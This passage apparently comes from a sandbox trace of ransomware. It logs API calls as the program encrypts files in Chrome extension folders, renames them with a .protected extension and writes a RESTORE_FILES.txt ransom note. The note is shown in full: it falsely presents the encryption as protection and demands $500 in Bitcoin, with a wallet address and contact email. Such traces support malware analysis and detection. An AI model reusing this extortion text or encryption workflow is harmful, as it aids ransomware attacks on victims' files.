(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.742] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.742] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.742] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.742] CloseHandle (hObject=0x164) returned 1 [0078.742] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.742] lstrcmpiW (lpString1="ko", lpString2="Windows") returned -1 [0078.742] lstrcmpiW (lpString1="ko", lpString2="Program Files") returned -1 [0078.742] lstrcmpiW (lpString1="ko", lpString2="Program Files (x86)") returned -1 [0078.742] lstrcmpiW (lpString1="ko", lpString2="$Recycle.bin") returned 1 [0078.742] lstrcmpiW (lpString1="ko", lpString2="System Volume Information") returned -1 [0078.742] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko") returned 141 [0078.743] lstrcmpW (lpString1="ko", lpString2=".") returned 1 [0078.743] lstrcmpW (lpString1="ko", lpString2="..") returned 1 [0078.743] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\*") returned 143 [0078.743] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.743] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.743] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.743] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.743] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.743] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.743] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\.") returned 143 [0078.743] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.743] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.743] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.743] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.744] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.744] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.744] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.744] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\..") returned 144 [0078.744] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.744] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.744] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.744] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.744] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.744] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.744] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.744] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.744] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\messages.json") returned 155 [0078.744] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.744] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.744] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.744] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.744] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.744] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\messages.json") returned 155 [0078.744] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.744] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\messages.json") returned 155 [0078.744] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.744] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\messages.json") returned 155 [0078.744] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.744] ReadFile (in: hFile=0x168, lpBuffer=0xd12130, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesRead=0x295d914*=0xe6, lpOverlapped=0x0) returned 1 [0078.745] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff1a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.745] WriteFile (in: hFile=0x168, lpBuffer=0xd12130*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesWritten=0x295d914*=0xe6, lpOverlapped=0x0) returned 1 [0078.745] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.745] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.746] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.746] CloseHandle (hObject=0x168) returned 1 [0078.746] wnsprintfW (in: pszDest=0xd12130, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\messages.json.protected") returned 165 [0078.746] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\messages.json.protected")) returned 1 [0078.746] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.746] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.746] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\RESTORE_FILES.txt") returned 159 [0078.746] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.747] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.747] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.747] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.747] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.748] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.748] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.748] CloseHandle (hObject=0x164) returned 1 [0078.748] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.748] lstrcmpiW (lpString1="lt", lpString2="Windows") returned -1 [0078.748] lstrcmpiW (lpString1="lt", lpString2="Program Files") returned -1 [0078.748] lstrcmpiW (lpString1="lt", lpString2="Program Files (x86)") returned -1 [0078.748] lstrcmpiW (lpString1="lt", lpString2="$Recycle.bin") returned 1 [0078.748] lstrcmpiW (lpString1="lt", lpString2="System Volume Information") returned -1 [0078.748] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt") returned 141 [0078.748] lstrcmpW (lpString1="lt", lpString2=".") returned 1 [0078.748] lstrcmpW (lpString1="lt", lpString2="..") returned 1 [0078.748] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\*") returned 143 [0078.748] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.748] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.748] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.748] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.748] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.748] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.748] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\.") returned 143 [0078.748] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.748] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.748] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.748] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.748] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.748] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.748] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.748] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\..") returned 144 [0078.749] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.749] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.749] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.749] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.749] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.749] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.749] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.749] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.749] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\messages.json") returned 155 [0078.749] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.749] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.749] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.749] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.749] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.749] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\messages.json") returned 155 [0078.749] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.749] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\messages.json") returned 155 [0078.749] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.749] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\messages.json") returned 155 [0078.749] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.749] ReadFile (in: hFile=0x168, lpBuffer=0xd12130, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesRead=0x295d914*=0xe4, lpOverlapped=0x0) returned 1 [0078.750] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff1c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.750] WriteFile (in: hFile=0x168, lpBuffer=0xd12130*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesWritten=0x295d914*=0xe4, lpOverlapped=0x0) returned 1 [0078.751] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.751] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.751] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.751] CloseHandle (hObject=0x168) returned 1 [0078.751] wnsprintfW (in: pszDest=0xd12130, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\messages.json.protected") returned 165 [0078.751] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\messages.json.protected")) returned 1 [0078.751] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.752] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.752] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\RESTORE_FILES.txt") returned 159 [0078.752] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.752] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.752] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.753] lstrlenA 